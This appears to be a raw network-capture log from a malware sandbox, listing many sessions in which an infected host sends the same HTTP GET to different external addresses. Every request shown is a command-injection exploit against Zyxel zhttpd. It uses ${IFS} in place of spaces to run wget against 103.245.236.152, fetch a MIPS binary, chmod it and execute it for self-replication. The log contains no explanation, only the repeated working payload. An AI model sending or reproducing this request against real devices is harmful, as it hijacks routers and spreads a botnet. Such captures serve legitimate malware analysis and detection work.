                                        Jan 14, 2024 16:18:30.124154091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        589192.168.2.133607469.67.16.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.124209881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        590192.168.2.1351326204.216.188.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.124238968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        591192.168.2.1336720163.228.169.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.124300957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        592192.168.2.1338436112.107.134.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.124340057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        593192.168.2.134357865.132.125.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.124424934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        594192.168.2.1359932121.183.231.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.124458075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        595192.168.2.1341948171.158.0.92443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.124511957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        596192.168.2.134117227.39.180.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.124573946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        597192.168.2.135408851.179.181.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.124630928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        598192.168.2.1338092152.184.40.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.124680996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        599192.168.2.1344770168.91.25.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.124747038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        600192.168.2.135599812.166.142.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.124794006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        601192.168.2.1339942144.7.169.92443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.124852896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        602192.168.2.1333934199.45.231.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.124907970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        603192.168.2.1337102156.124.166.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.125049114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        604192.168.2.1339848167.110.68.68443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.125108004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        605192.168.2.1349570201.3.186.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.125164032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        606192.168.2.134977637.172.206.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.125225067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        607192.168.2.135142078.250.88.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.125279903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        608192.168.2.1346026222.255.7.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.125324965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        609192.168.2.133486688.110.82.101443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.125391006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        610192.168.2.1345462103.253.215.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.125437975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        611192.168.2.134078463.203.14.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.125489950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        612192.168.2.1358042141.172.95.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.125544071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        613192.168.2.1352186132.42.254.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.125602007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        614192.168.2.1348322116.193.118.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.125642061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        615192.168.2.1341968130.107.134.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.125696898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        616192.168.2.1338102197.74.95.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.125751019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        617192.168.2.1338142134.22.66.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.125804901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        618192.168.2.1342810177.82.93.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.125865936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        619192.168.2.1342096194.36.242.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.125915051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        620192.168.2.1337026201.13.216.68443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.125972033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        621192.168.2.1343458113.195.202.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.126033068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        622192.168.2.1338138163.132.22.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.126068115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        623192.168.2.13363169.127.205.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.126142025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        624192.168.2.134965061.98.118.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.126199007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        625192.168.2.134289073.4.18.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.126255035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        626192.168.2.1336592217.134.224.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.126291990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        627192.168.2.1346564140.196.187.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.126348019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        628192.168.2.134454444.71.144.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.126383066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        629192.168.2.1353742212.115.216.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.126430988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        630192.168.2.1357958172.54.79.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.126487017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        631192.168.2.1360726202.249.156.71443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.126532078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        632192.168.2.1348876150.207.118.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.126588106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        633192.168.2.1355214189.41.19.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.126647949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        634192.168.2.1335864189.65.86.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.126713037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        635192.168.2.135393814.107.73.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.126754045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        636192.168.2.1344598112.96.168.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.126833916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        637192.168.2.1358786163.190.34.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.126885891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        638192.168.2.133839040.17.211.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.126948118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        639192.168.2.1357490106.206.77.150443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.127015114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        640192.168.2.135032843.132.102.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.127065897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        641192.168.2.1341980154.200.93.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.127136946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        642192.168.2.1357536218.236.84.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.127183914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        643192.168.2.13471568.230.11.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.127229929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        644192.168.2.135974897.31.39.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.127294064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        645192.168.2.13516221.108.13.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.127358913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        646192.168.2.1357870153.133.105.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.127415895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        647192.168.2.133409637.36.84.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.127461910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        648192.168.2.1344500182.9.72.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.127511024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        649192.168.2.1338920178.107.226.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.127584934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        650192.168.2.1342928129.205.53.176443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.127655029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        651192.168.2.134335443.145.247.77443
                                        TimestampBytes transferredDirectionData
